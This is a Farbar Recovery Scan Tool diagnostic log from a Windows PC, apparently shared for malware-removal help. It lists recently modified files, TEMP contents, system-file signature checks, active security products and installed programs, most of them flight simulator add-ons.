2014-11-11 21:19 - 2014-05-17 14:39 - 00000000 ___SD () C:\Windows\system32\CompatTel

2014-11-11 21:19 - 2014-03-16 13:14 - 00000000 ___RD () C:\Users\Swintal\Google Drive

2014-11-11 21:19 - 2014-03-02 15:57 - 00000000 ____D () C:\Windows\Minidump

2014-11-11 21:19 - 2014-03-02 13:18 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Virtuali

2014-11-11 21:19 - 2014-03-01 12:28 - 00000000 ____D () C:\Users\Swintal

2014-11-11 21:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\registration

2014-11-11 21:19 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions

2014-11-11 21:16 - 2014-08-10 14:33 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA.job

2014-11-11 21:13 - 2014-03-01 15:15 - 01648133 _____ () C:\Windows\WindowsUpdate.log

2014-11-11 21:13 - 2009-07-13 23:45 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2014-11-11 21:13 - 2009-07-13 23:45 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2014-11-11 21:07 - 2014-03-02 15:57 - 1095844079 _____ () C:\Windows\MEMORY.DMP

2014-11-11 17:05 - 2014-07-10 17:00 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job

2014-11-11 16:58 - 2014-03-01 12:59 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-11-11 16:15 - 2010-11-20 22:47 - 00099780 _____ () C:\Windows\PFRO.log

2014-11-11 15:05 - 2014-07-10 17:00 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2014-11-11 15:05 - 2014-07-10 17:00 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2014-11-11 15:05 - 2014-07-10 17:00 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater

2014-11-11 14:56 - 2014-06-07 15:03 - 00000000 ____D () C:\Users\Public\Documents\PFPX Data

2014-11-11 14:56 - 2014-03-02 14:25 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aerosoft

2014-11-11 14:56 - 2014-03-01 12:36 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information

2014-11-11 13:19 - 2014-03-02 13:18 - 00000000 ____D () C:\ProgramData\TEMP

2014-11-11 13:18 - 2014-03-01 20:09 - 00000000 ____D () C:\Users\Swintal\Documents\Flight Simulator X Files

2014-11-11 13:00 - 2014-03-08 12:42 - 00000000 ____D () C:\Users\Swintal\Downloads\WOAi

2014-11-11 12:54 - 2014-03-03 10:22 - 00000000 ____D () C:\Users\Swintal\Downloads\LUVCARS_4_Build_1_Beta_6

2014-11-11 12:41 - 2014-09-14 14:16 - 00000000 ____D () C:\Users\Swintal\Documents\Paradox Interactive

2014-11-11 12:41 - 2014-06-30 18:01 - 00000000 ____D () C:\Users\Swintal\Documents\RCT3

2014-11-11 12:40 - 2014-09-29 18:55 - 00000000 ____D () C:\Users\Swintal\Desktop\Jake Photos

2014-11-11 12:40 - 2014-08-16 13:04 - 00000000 ____D () C:\Users\Swintal\Documents\FS Flight Keeper

2014-11-11 12:40 - 2014-05-11 15:32 - 00000000 ___SD () C:\Users\Swintal\Documents\My Data Sources

2014-11-11 12:40 - 2014-03-15 11:44 - 00000000 ____D () C:\Users\Swintal\Documents\Garmin

2014-11-11 12:40 - 2014-03-14 13:01 - 00000000 ____D () C:\Users\Swintal\Documents\Aerosoft

2014-11-11 12:40 - 2014-03-07 16:55 - 00000000 ____D () C:\Users\Swintal\Documents\Andreas Folder

2014-11-11 12:39 - 2014-10-04 11:39 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\NBSoftSolutions

2014-11-11 12:39 - 2014-03-02 12:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\PMDG

2014-11-11 12:38 - 2014-09-27 06:31 - 00000000 ____D () C:\Users\Swintal\AppData\Local\PI Engineering

2014-11-11 12:38 - 2014-06-30 18:01 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Atari

2014-11-11 12:38 - 2014-06-20 16:15 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Juniper Networks

2014-11-11 12:38 - 2014-05-16 07:45 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Origin

2014-11-11 12:38 - 2014-04-05 18:19 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Apple Computer

2014-11-11 12:38 - 2014-03-15 11:38 - 00000000 ____D () C:\Users\Swintal\AppData\Roaming\Garmin

2014-11-11 12:37 - 2014-03-16 09:43 - 00000000 ____D () C:\Users\Swintal\AppData\Local\HP

2014-11-11 12:37 - 2014-03-01 12:59 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Google

2014-11-11 12:36 - 2014-03-02 16:42 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Apps\2.0

2014-11-11 12:35 - 2014-10-03 14:52 - 00000000 ____D () C:\Users\Swintal\AppData\Local\AAC7AD0A-50D1-41BC-A353-7B7B50729544.aplzod

2014-11-11 12:35 - 2014-04-05 18:19 - 00000000 ____D () C:\Users\Swintal\AppData\Local\Apple Computer

2014-11-11 12:34 - 2014-05-16 07:42 - 00000000 ____D () C:\ProgramData\Origin

2014-11-11 12:34 - 2014-03-15 11:42 - 00000000 ____D () C:\ProgramData\Garmin

2014-11-11 10:16 - 2014-08-10 14:33 - 00000864 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core.job

2014-11-11 08:01 - 2014-03-02 12:38 - 00116616 _____ () C:\Users\Swintal\AppData\Local\GDIPFONTCACHEV1.DAT

2014-11-11 07:59 - 2009-07-13 23:45 - 00448104 _____ () C:\Windows\system32\FNTCACHE.DAT

2014-11-11 07:57 - 2014-03-01 19:17 - 00729172 _____ () C:\Windows\DirectX.log

2014-11-09 20:19 - 2014-03-02 13:08 - 00002010 _____ () C:\Users\Swintal\AppData\Roaming\mainhst.zgh

2014-11-09 17:26 - 2014-07-03 17:20 - 00002609 _____ () C:\Users\Public\Desktop\Navtech PBS.lnk

2014-11-08 13:44 - 2014-06-30 16:00 - 00000000 ____D () C:\Program Files (x86)\Steam

2014-11-08 08:30 - 2009-07-14 00:13 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI

2014-11-07 17:49 - 2014-10-03 14:34 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69

2014-11-07 17:49 - 2014-04-05 18:18 - 00000000 ____D () C:\Program Files\Common Files\Apple

2014-11-06 12:06 - 2014-09-01 15:44 - 01715224 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll

2014-11-06 12:06 - 2014-09-01 15:44 - 01291280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll

2014-11-06 12:06 - 2014-03-01 16:24 - 02800296 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll

2014-11-06 12:06 - 2014-03-01 16:24 - 02197680 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll

2014-11-05 12:48 - 2014-05-18 08:27 - 00000000 ____D () C:\ProgramData\ACARS

2014-11-05 11:00 - 2014-03-16 13:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive

2014-11-04 15:40 - 2014-03-01 18:40 - 00000000 ____D () C:\Windows\system32\MRT

2014-11-01 17:05 - 2014-06-07 15:06 - 00000777 _____ () C:\Users\Public\Desktop\Aerosoft Launcher.lnk

2014-11-01 16:54 - 2014-08-16 12:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UK2000 Scenery

2014-11-01 13:07 - 2014-03-02 12:28 - 00014352 _____ () C:\Users\Swintal\Downloads\Activation Code Workbook.xlsx

2014-10-28 09:00 - 2014-03-01 13:00 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk

2014-10-28 08:14 - 2009-07-14 00:08 - 00032608 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

2014-10-28 05:34 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

2014-10-26 09:21 - 2014-05-18 08:27 - 00002041 _____ () C:\Users\Public\Desktop\UVACARS.lnk

2014-10-25 09:50 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF

2014-10-25 07:53 - 2014-03-03 09:26 - 00000000 ____D () C:\Program Files\Microsoft Office 15

2014-10-19 08:53 - 2014-03-01 12:59 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2014-10-19 08:53 - 2014-03-01 12:59 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2014-10-18 09:11 - 2014-08-10 14:33 - 00003890 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA

2014-10-18 09:11 - 2014-08-10 14:33 - 00003494 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core

2014-10-17 03:00 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache

 

Files to move or delete:

====================

C:\Users\Swintal\FlightBeam_Denver International - HD.reg

C:\Users\Swintal\FlightBeam_Washington Dulles Intl - HD.reg

C:\Users\Swintal\FSDreamTeam_JFK.reg

C:\Users\Swintal\FSDreamTeam_KIAH.reg

C:\Users\Swintal\FSDreamTeam_Los Angeles V2.reg

C:\Users\Swintal\QualityWings_Ultimate 757 Collection.reg

 

 

Some content of TEMP:

====================

C:\Users\Swintal\AppData\Local\Temp\Couponscom.exe

C:\Users\Swintal\AppData\Local\Temp\dsHostCheckerSetup.exe

C:\Users\Swintal\AppData\Local\Temp\InstHelper.exe

C:\Users\Swintal\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe

C:\Users\Swintal\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe

C:\Users\Swintal\AppData\Local\Temp\jre-7u67-windows-i586-iftw.exe

C:\Users\Swintal\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe

C:\Users\Swintal\AppData\Local\Temp\nvSCPAPI.dll

C:\Users\Swintal\AppData\Local\Temp\nvSCPAPI64.dll

C:\Users\Swintal\AppData\Local\Temp\nvStInst.exe

 

 

==================== Bamital & volsnap Check =================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\System32\winlogon.exe => File is digitally signed

C:\Windows\System32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\System32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\System32\services.exe => File is digitally signed

C:\Windows\System32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\System32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\System32\rpcss.dll => File is digitally signed

C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2014-11-05 12:09

 

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014

Ran by Swintal at 2014-11-11 21:38:57

Running from C:\Users\Swintal\Desktop

Boot Mode: Normal

==========================================================

 

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: ESET Smart Security 8.0 (Enabled - Up to date) {19259FAE-8396-A113-46DB-15B0E7DFA289}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: ESET Smart Security 8.0 (Enabled - Up to date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}

FW: ESET Personal firewall (Enabled) {211E1E8B-C9F9-A04B-6D84-BC85190CE5F2}

 

==================== Installed Programs ======================

 

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

A2A C172 Trainer for FSX (HKLM-x32\...\A2A C172 Trainer for FSX) (Version:  - )

ACARS - 1  (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\2acd65cafe4fafc9) (Version: 2.21.0.22 - United Virtual Airlines)

ACARS (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ca11877970cf2b3f) (Version: 2.0.0.48 - United Virtual Airlines)

Active Sky Next for FSX SP1B (HKLM-x32\...\{F1AE1E08-5094-46AD-AA4D-670C482723B2}_is1) (Version: 1.0.5410.16208 - HiFi Technologies, Inc.)

Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.223 - Adobe Systems Incorporated)

Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)

Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.2.0.3 - Aerosoft)

Aerosoft's - Airbus A318-A319 - FSX (HKLM-x32\...\Airbus A318-A319 - FSX) (Version: 1.10 - Aerosoft)

Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.00 - Aerosoft)

Aerosoft's - Anchorage X - FSX (HKLM-x32\...\Anchorage X - FSX) (Version:  - )

Aerosoft's - Mega Airport Dublin - FSX (HKLM-x32\...\Mega Airport Dublin - FSX) (Version: 1.10 - Aerosoft)

Aerosoft's - Mega Airport Duesseldorf - FSX (HKLM-x32\...\Mega Airport Duesseldorf - FSX) (Version:  - )

aerosoft's - Mega Airport Frankfurt X (HKLM-x32\...\{BAEE0C24-C8C2-4820-9DF4-887909F1A286}) (Version: 1.04 - aerosoft)

Aerosoft's - Mega Airport London Heathrow Xtended - FSX (HKLM-x32\...\Mega Airport London Heathrow Xtended - FSX) (Version: 1.00 - Aerosoft)

ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden

Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

ASConnect for FSX Installer (HKLM-x32\...\{7E1270D4-42C4-49A4-9EC4-3300D2E47331}_is1) (Version: 1.0.5410.16224 - HiFi Technologies, Inc.)

Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\...\{61942EF5-2CD8-47D4-869C-2E9A8BB085F1}) (Version: 1.3.4.001 - Asmedia Technology)

B1900D HD SERIES FSX/P3D (HKLM-x32\...\B1900D HD SERIES FSX/P3D) (Version: 1.00.00.00 - Carenado)

Black ICE 6.21r2945 (HKLM-x32\...\{015E0577-7D4A-456C-A435-DD9EE7E72589}_is1) (Version: 6.21r2945 - Panzeroo, Inc.)

bluCARS (HKLM-x32\...\{BD892214-8231-4910-8DBB-F277EE572B15}) (Version: 1.0.1014 - FS Products)

Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)

CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.1.2 - Canon Inc.)

CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.9.0.9 - Canon Inc.)

Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.8.0.7 - Canon Inc.)

Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.6.0.1 - Canon Inc.)

Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.7.0.4 - Canon Inc.)

Canon Utilities Digital Photo Professional 3.10 (HKLM-x32\...\DPP) (Version: 3.10.2.0 - Canon Inc.)

Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.10.2.0 - Canon Inc.)

Canon Utilities EOS Video Snapshot Task for ZoomBrowser EX (HKLM-x32\...\EOS Video Snapshot Task) (Version: 1.0.0.10 - Canon Inc.)

Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)

Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.9.0.0 - Canon Inc.)

Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.7.0.24 - Canon Inc.)

Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.5.0.9 - Canon Inc.)

Cheat Engine 6.4 (HKLM-x32\...\Cheat Engine 6.4_is1) (Version:  - Cheat Engine)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

Elevated Installer (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden

Empire: Total War (HKLM-x32\...\Steam App 10500) (Version:  - The Creative Assembly)

ESET Smart Security (HKLM\...\{C082CDB9-D173-4740-AE0E-C685E6F44850}) (Version: 8.0.304.0 - ESET, spol s r. o.)

Flight Simulator X (HKLM-x32\...\RTMshadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version:  - )

Flight Simulator X Service Pack 1 (HKLM-x32\...\SP1shadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version:  - )

FlightBeam Denver FSX (HKLM-x32\...\FlightBeam Denver FSX_is1) (Version: 1.0 - FlightBeam.)

FlightBeam San Francisco International FSX (HKLM-x32\...\FlightBeam San Francisco International FSX_is1) (Version: 2.1 - FlightBeam.)

FlightBeam Washington Dulles FSX (HKLM-x32\...\FlightBeam Washington Dulles FSX_is1) (Version: 1.2.3 - FlightBeam.)

FS Flight Keeper (HKLM-x32\...\{B7057895-A93D-44D6-B87A-D3C1FCF28E01}) (Version: 3.5.1 - Thomas Molitor & Aerosoft GmbH)

FSDreamTeam Hawaiian Airports Volume 2 FSX (HKLM-x32\...\FSDreamTeam Hawaiian Airports Volume 2 FSX_is1) (Version: 1.5.1 - VIRTUALI Sagl)

FSDreamTeam Honolulu International FSX (HKLM-x32\...\FSDreamTeam Honolulu International FSX_is1) (Version: 1.4 - VIRTUALI s.a.s.)

FSDreamTeam Houston Intercontinental Airport FSX (HKLM-x32\...\FSDreamTeam Houston Intercontinental Airport FSX_is1) (Version: 1.0.2 - VIRTUALI Sagl)

FSDreamTeam KJFK FSX (HKLM-x32\...\FSDreamTeam KJFK FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.)

FSDreamTeam Las Vegas McCarran FSX (HKLM-x32\...\FSDreamTeam Las Vegas McCarran FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.)

FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.5 - VIRTUALI s.a.s.)

FSDreamTeam OHareX FSX (HKLM-x32\...\FSDreamTeam OHareX FSX_is1) (Version: 2.3 - VIRTUALI s.a.s.)

FSFDT FSCopilot (HKLM-x32\...\FSFDT FSCopilot) (Version:  - )

FSFDT FSInn (HKLM-x32\...\FSFDT FSInn) (Version:  - )

Galeao Intl Airport FSX Prepar3d 2.1 (HKLM-x32\...\sbgl2012fsx) (Version: 2.1 - TropicalSim)

Garmin Express (HKLM-x32\...\{817c6bb8-ea2d-4e12-abbc-e33c3de43f64}) (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries)

Garmin Express (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden

Garmin Express Tray (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden

Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)

Globe Cargo PIREP (HKLM-x32\...\{93E6FA87-33AD-429C-BE11-F947250FE3BA}) (Version: 3.0.1 - Globe Cargo Virtual Airlines)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)

Google Drive (HKLM-x32\...\{C60F3836-333A-4AE2-B526-CFDBA143A9BA}) (Version: 1.18.7821.2489 - Google, Inc.)

Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)

Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden

Google+ Auto Backup (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Google+ Auto Backup) (Version: 1.0.26.151 - Google, Inc.)

Hearts of Iron III (HKLM-x32\...\Steam App 25890) (Version:  - Paradox Development Studio)

HP ENVY 4500 series Basic Device Software (HKLM\...\{38A08516-1847-43E4-8076-9540B60EC43B}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)

HP ENVY 4500 series Help (HKLM-x32\...\{95BECC50-22B4-4FCA-8A2E-BF77713E6D3A}) (Version: 30.0.0 - Hewlett Packard)

HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)

HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)

iCloud (HKLM\...\{2AAF09D5-4B3F-4975-B6A9-ECE2631FC942}) (Version: 4.0.5.20 - Apple Inc.)

Intel® Network Connections 18.1.59.0 (HKLM\...\PROSetDX) (Version: 18.1.59.0 - Intel)

Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)

iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)

Juniper Networks Host Checker (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Neoteris_Host_Checker) (Version: 7.1.0.20169 - Juniper Networks)

Juniper Networks, Inc. Setup Client (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Juniper_Setup_Client) (Version: 7.1.6.17115 - Juniper Networks, Inc.)

MacroWorks 3.1 (HKLM-x32\...\MacroWorks 3.1) (Version:  - PI Engineering)

Majestic MJC8Q400 Version 1.008 (HKLM-x32\...\MJC8Q400) (Version:  - )

Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)

Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)

Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)

Microsoft Flight Simulator X: Acceleration (HKLM-x32\...\FlightSim_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: 10.0.61637.0 - Microsoft Game Studios)

Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)

Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4659.1001 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft SQL Server Compact 3.5 SP1 English (HKLM-x32\...\{E59113EB-0285-4BFD-A37A-B79EAC6B8F4B}) (Version: 3.5.5692.0 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden

MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)

Navigraph FMS Data Manager 1.0.11.0603 (HKLM-x32\...\{7E4D5716-374A-4DB6-90CF-D2AEB67362CE}_is1) (Version: 1.0.11.0603 - Navigraph)

Navtech PBS (HKLM-x32\...\{3582DCD8-F0DF-4B2A-808A-2A67BEFEAFA0}) (Version: 14.5.5 - Navtech Inc)

NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)

NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)

NVIDIA GeForce Experience 2.1.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.4 - NVIDIA Corporation)

NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)

NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)

NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)

Office 15 Click-to-Run Extensibility Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden

Office 15 Click-to-Run Licensing Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden

Office 15 Click-to-Run Localization Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden

Origin (HKLM-x32\...\Origin) (Version: 9.4.6.2792 - Electronic Arts, Inc.)

PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.3 - pdfforge)

Photo Common (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Photo Gallery (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)

PMDG 737 6700 NGX RTM (HKLM-x32\...\{C7EE862A-D83D-4A9F-B746-CBDE39BD7001}) (Version: 1.00.3219 - PMDG Simulations, LLC.)

